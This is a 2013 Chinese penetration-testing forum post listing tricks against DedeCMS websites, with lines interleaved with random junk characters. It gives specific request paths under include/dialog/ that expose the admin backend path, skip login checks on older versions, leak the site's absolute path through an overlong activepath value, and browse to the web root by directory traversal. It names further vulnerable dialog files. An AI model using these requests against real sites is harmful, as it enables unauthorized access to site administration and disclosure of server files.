中国网络渗透测试联盟

标题: dedecms爆后台文件技巧 [打印本页]
作者: admin    时间: 2013-4-16 16:50
标题: dedecms爆后台文件技巧
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
7 d* e- ~% }2 d, f7 C5 m! q7 D2 ^, B3 c) b4 p
员帐号,新版本的就直接转向了后台.  O6 p; V' R7 b. M

+ \2 o$ G* |* e4 g% B5 d2.include/dialog/config.php会爆出后台管理路径
& ~# n) Z3 F. U* k% ]. B# ~; e$ W" K/ G9 g) {& K4 A+ [3 H
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
# ~  o( D, {  @" \" z. R( u8 b+ k: a5 V( y! e; m) m
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
+ f' c$ e. J1 [9 H2 k9 T
7 I. k' ]+ T  G, ~5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉2 F# O+ S" n. r, t

+ C5 _! G$ w6 K7 _到根目录去.不过这些版本的访问地址有些不同.
( E; m4 ?' @. k& @) {) A地址为require/dialog/select_soft.php?activepath=/././././././././
1 \! @+ R( a, r1 Y+ R
; l3 R/ J7 O" linclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
( F* v8 P2 @1 x; }/ L% X. r5 p存在相同问题的文件还有
9 D3 B) U5 E% u# L' {include\dialog\select_images.php4 y+ v3 `: G! s! }8 Z
include\dialog\select_media.php
& [6 I- @  z9 Ainclude\dialog\select_templets.php​
+ s; _( P+ O# s: N; I& r



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2